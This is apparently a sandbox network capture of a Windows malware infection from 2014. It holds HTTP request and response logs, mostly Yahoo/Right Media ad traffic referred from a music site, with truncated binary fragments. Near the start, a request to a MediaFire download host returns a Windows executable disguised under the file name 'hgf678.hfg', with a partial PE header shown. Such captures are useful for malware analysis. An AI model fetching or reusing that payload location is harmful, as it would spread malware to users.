Date: Mon, 21 Apr 2014 11:57:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://widgets.amung.us/small/05/567.png
Set-Cookie: uid=CgH9JVNVB7ouXzqMKw CAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=atta; path=/
0..
GET /lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc
Host: download627.mediafire.com
HTTP/1.1 200 OK
Server: LRBD-bigdownload-
Date: Mon, 21 Apr 2014 11:57:22 GMT
Connection: close
Accept-Ranges: bytes
Content-transfer-encoding: binary
Content-Length: 162416
Content-Disposition: attachment; filename="hgf678.hfg"
Content-Type: application/x-dosexec
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].......................p...............rich............................PE..L...h........................ ....................@..................................U..........................................$........................4...$...$...................$...............................................................text............................... ..`.data....!..........................@....rsrc.p."...........................@..@l.[J.............SVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:29 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0973.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: ih="b!!!!#!L>v#!!!!#>gR*'"; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT
Set-Cookie: vuday1=IsXSs!6tS(i!$_D; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; path=/; expires=Wed, 21-May-2014 11:57:29 GMT
Set-Cookie: liday1=iSs5t#Kdr=!6tS($AOnF; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: RMBX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Thu, 21-Apr-2016 11:57:29 GMT; domain=.yahoo.com
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:29 GMT
Expires: Mon, 21 Apr 2014 11:57:29 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
2cf..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjV9rgzAUxT-Nb07y56bNCHuI1cigCSso2.rWOWu0cRVMseunn1LpB9jhcvhd7j0cTAXDz9V3dUAY1hyvCAgMjANhR4QgREIIQsmacMxXOCz9j8t8fyjqDdw-TrGcpZt9uZN31bO93vmNz75JqFXtckYN0wumFgb5f8VpFJ8XnvrGqTrhcqi4s2kRP94SdTLt7vaZS9i-a2Yy7XWunP7Fjc6KcZuXdN8VV9PWSBPjzPhIvoSh9b4PqAyImuYS9Zevp2Pjo.LcTTsBBpH1nQuoGgKaUISuhKE.WBteBA==,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 24759736;.rm_data.offer_type = 49;.rm_data.entity_id = 882998;..if (window.rm_crex_data) {rm_crex_data.push(24759736);}..0..0......
<<
<<< skipped >>>
GET /get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:43 GMT
P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Type: text/javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
0......
GET /st?ad_type=ad&ad_size=300x250§ion=5397210 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0230.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:44 GMT
Expires: Mon, 21 Apr 2014 11:57:44 GMT
Pragma: no-cache
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=1531230313";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent
<<
<<< skipped >>>
GET /get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; vuday1=IsXSsIsXSs!6tS(%T)C/; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:44 GMT
P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Type: text/javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
0..HTTP/1.1 200 OK..Date: Mon, 21 Apr 2014 11:57:44 GMT..P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"..Cache-Control: private..Content-Type: text/javascript..Age: 0..Transfer-Encoding: chunked..Connection: keep-alive..Server: YTS/1.20.13..0..
GET /small/05/560.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: widgets.amung.us
HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/png
Content-Length: 330
Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT
Connection: keep-alive
Expires: Wed, 21 May 2014 11:57:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...P.........D......9PLTE.bM.nX.82.G:................zc.....z.UC..n.'-00/...555...........IDAT8...... .....A......s..?q..c&., nm,.r.<M....GGP7s. .......x...!..~.5.....4_..._`.$.P.c.~. .... q.@#.".,..K..>.... .....%.YC}INrz ;.'....9.b.Z.....C...G./.X.Vz....(.<.....l.;.c.a:...\.s..[..,.6....rc}.I>I...oZ....IEND.B`.HTTP/1.1 200 OK..Server: nginx/1.2.4..Date: Mon, 21 Apr 2014 11:57:29 GMT..Content-Type: image/png..Content-Length: 330..Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT..Connection: keep-alive..Expires: Wed, 21 May 2014 11:57:29 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes...PNG........IHDR...P.........D......9PLTE.bM.nX.82.G:................zc.....z.UC..n.'-00/...555...........IDAT8...... .....A......s..?q..c&., nm,.r.<M....GGP7s. .......x...!..~.5.....4_..._`.$.P.c.~. .... q.@#.".,..K..>.... .....%.YC}INrz ;.'....9.b.Z.....C...G./.X.Vz....(.<.....l.;.c.a:...\.s..[..,.6....rc}.I>I...oZ....IEND.B`...
GET /swidget/h20d2qja0b7p.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: whos.amung.us
Connection: Keep-Alive
HTTP/1.1 303 See Other
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://widgets.amung.us/small/05/560.png
Set-Cookie: uid=CgH9IFNVB6ljRxZt0akKAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=atta; path=/
0..
GET /st?ad_type=ad&ad_size=300x250§ion=5397210 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:29 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0801.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: B=7atjd219la1t9&b=3&s=iu; path=/; expires=Thu, 21-Apr-2016 11:57:29 GMT; domain=.yahoo.com
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:29 GMT
Expires: Mon, 21 Apr 2014 11:57:29 GMT
Pragma: no-cache
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=3369660399";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent
<<
<<< skipped >>>
GET /get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:29 GMT
P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT
Cache-Control: private
Content-Type: text/javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
0..HTTP/1.1 200 OK..Date: Mon, 21 Apr 2014 11:57:29 GMT..P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"..Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT..Cache-Control: private..Content-Type: text/javascript..Age: 0..Transfer-Encoding: chunked..Connection: keep-alive..Server: YTS/1.20.13..0......
GET /st?ad_type=ad&ad_size=300x250§ion=5397210 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:43 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0230.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:43 GMT
Expires: Mon, 21 Apr 2014 11:57:43 GMT
Pragma: no-cache
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=2659402730";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent
<<
<<< skipped >>>
GET /imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:43 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor2111.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; path=/; expires=Wed, 20-Apr-2016 11:57:43 GMT
Set-Cookie: vuday1=IsXSsIsXSs!6tS(%T)C/; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:43 GMT
Expires: Mon, 21 Apr 2014 11:57:43 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
2cb..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjd1qhDAQRp.GOyv5tZHQi7gaka5uKcpuvFNBo5iupVls-.RVVtr7fgwfZ5iBAzFvOp82pAMEM1DjoOaQUEaQj.wGuYBzjnzwGATQB8xt7duU2Lku-8MlVEsotpwusF3EPf1W6Z1f2NaHCGs57mf5enre8V2nRPw.YeyF151X3-rvIybUoIyOy.D3LUqhMhmtznI8njOaJ5nNCjllX3CoivL7WMRLPgqgjJyqpIT5n-DJdbW1s4OFg-Q6N2--NQ.dYL32atYdEUo8bc3kYPnh4AgD8Iko-AGz-l3-,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 25953687;.rm_data.offer_type = 60;.rm_data.entity_id = 985256;..if (window.rm_crex_data) {rm_crex_data.push(25953687);}..0..0......
<<
<<< skipped >>>
GET /imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; vuday1=IsXSsIsXSs!6tS(%T)C/; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0232.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: ih="b!!!!%!L>v#!!!!#>gR*'!N94=!!!!#>gR*6!N94N!!!!#>gR*5"; path=/; expires=Wed, 20-Apr-2016 11:57:44 GMT
Set-Cookie: vuday1=IsXSsIsXSs!6tS(%T)C/; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: liday1=iSs5t)ghL.1^Rke#Kdr=!6tS(%ILCn; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:44 GMT
Expires: Mon, 21 Apr 2014 11:57:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
2cf..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjVFPgzAUhX8Nb0jKbYslZA.toIS4OmNYFN42ZNQKDmMXnL.ekpH9AE9uTr6Te29OiJP2COgQxfesgTfUAk1CQhmBCNi-9VGSJDiOMHM5jv3Gfva5Hfe7bp2LahJ81vY1bCZ-VTdbceUnNvs6xVqaZS2ftw8LfumC8P9LZIE4Lez6XH-XMl5dukFnO3E7SwtQuRxqo.vNi6KPubKqlL26IMe12ZTSVL.yoy45qk0G1XT7XPm-tnb0MPdAujkH4.lwd3y3QXMaXAZCSaDt0HtYfns4xQj9AEV.DWFedw==,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 25953670;.rm_data.offer_type = 60;.rm_data.entity_id = 985256;..if (window.rm_crex_data) {rm_crex_data.push(25953670);}..0..0..
<<
<<< skipped >>>
GET /2454.html?s=300x250 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: u.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT
ETag: f0908d483f8ef53a51e6767d7fecbe97
X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1
Accept-Ranges: bytes
X-Timestamp: 1392737142.11331
Content-Type: text/html
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 382
Cache-Control: public, max-age=673
Expires: Mon, 21 Apr 2014 12:08:41 GMT
Date: Mon, 21 Apr 2014 11:57:28 GMT
Connection: keep-alive
..........m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n..........
GET /2454.html?s=300x250 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
